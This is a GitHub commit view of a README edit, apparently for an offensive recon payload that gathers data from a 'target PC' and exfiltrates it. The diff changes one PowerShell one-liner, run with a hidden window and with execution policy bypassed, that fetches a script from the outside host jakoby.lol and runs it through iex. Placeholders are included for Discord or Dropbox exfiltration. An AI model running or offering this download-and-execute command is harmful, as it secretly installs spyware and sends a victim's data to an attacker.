Update README.md

This commit is contained in:
I-Am-Jakoby 2023-01-01 17:12:30 -06:00 committed by GitHub
parent 1a7158628e
commit 577e90da27
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -67,7 +67,7 @@ This program enumerates a target PC to collect as much recon data as possible fo
Fill in either or both of these two methods to exfil your collected data
```
powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex
powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/aucrjmf | iex
```
<p align="right">(<a href="#top">back to top</a>)</p>